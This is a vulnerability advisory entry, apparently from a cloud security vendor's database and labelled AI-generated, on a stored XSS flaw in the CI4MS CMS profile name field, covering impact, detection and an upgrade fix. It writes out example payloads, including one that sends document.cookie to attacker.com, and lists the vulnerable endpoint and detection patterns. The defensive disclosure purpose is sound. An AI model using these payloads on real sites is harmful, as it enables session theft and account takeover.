
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34989 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, that enables authenticated attackers to inject persistent JavaScript payloads via profile name fields, potentially leading to full account takeover and privilege escalation across all user roles. The vulnerability affects all versions up to and including 0.28.6.0 and was disclosed on April 2, 2026, with a patch released in version 31.0.0.0. It carries a CVSS v4 base score of 9.4 (Critical) and a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory).
The root cause is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-269 (Improper Privilege Management). The application fails to sanitize user-controlled input in the profile name/full name fields at the point of storage, and subsequently renders these values unsafely across multiple views using DOM sinks such as .html() or innerHTML without output encoding. An attacker with a low-privileged account can submit a malicious payload (e.g., <img src=x onerror=alert(document.domain)>) via the /backend/users/profile/ endpoint; the payload then executes automatically in the browsers of any user — including administrators — who visits affected pages such as /backend/users/ (User Management), blog pages, or other public-facing interfaces that render profile names (GitHub Advisory, CI4MS Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other users, including administrators, enabling session cookie theft, credential capture, unauthorized privileged actions, and full admin account takeover. Because the payload persists server-side and executes across multiple application views — including administrative and public-facing interfaces — a single injection can compromise all roles that view the affected pages. This creates a clear path for privilege escalation from a low-privileged user to full application compromise (GitHub Advisory).
A proof-of-concept (PoC) with step-by-step reproduction instructions and a video demonstration is publicly available in the GitHub Security Advisory, making exploitation straightforward for any authenticated user (CI4MS Advisory). The EPSS score is approximately 0.047% (16th percentile), indicating a currently low but non-negligible probability of exploitation in the wild within 30 days. There is no confirmed evidence of active in-the-wild exploitation or threat actor attribution at this time, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).
/backend/users/profile/.<img src=x onerror=alert(document.domain)> or a more targeted payload to exfiltrate cookies (e.g., <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">)./backend/users/ (User Management page), blog pages, or other public-facing views.GET https://attacker.com/?c=<session_token>); unusual JavaScript-initiated requests originating from admin browser sessions./backend/users/profile/ with HTML/JavaScript content in the name parameter body; repeated access to /backend/users/ by the attacker's account shortly before admin session anomalies.<script>, <img src=x onerror=, javascript:) rather than plain text.Upgrade CI4MS to version 31.0.0.0, which contains the official fix for this vulnerability (GitHub Advisory). As an interim workaround for deployments that cannot immediately upgrade, implement strict server-side input validation and sanitization on all profile name fields before storing values, replace unsafe DOM manipulation methods (.html(), innerHTML) with safe alternatives (.text(), textContent), apply context-appropriate HTML entity encoding on all user-controlled output, and deploy a Content Security Policy (CSP) header to limit the impact of any injected scripts. Auditing all application views that render user-supplied profile data for unsafe output encoding is also strongly recommended.
The vulnerability was reported by researchers bugmithlegend and peeefour and published by bertugfahriozer to the CI4MS repository on April 2, 2026 (CI4MS Advisory). A video PoC was made available via Mega.nz alongside the advisory. The vulnerability was picked up by automated vulnerability tracking platforms including VulDB, CVEFeed, and Bluesky CVE feeds shortly after disclosure, reflecting standard community monitoring activity with no notable broader media coverage identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."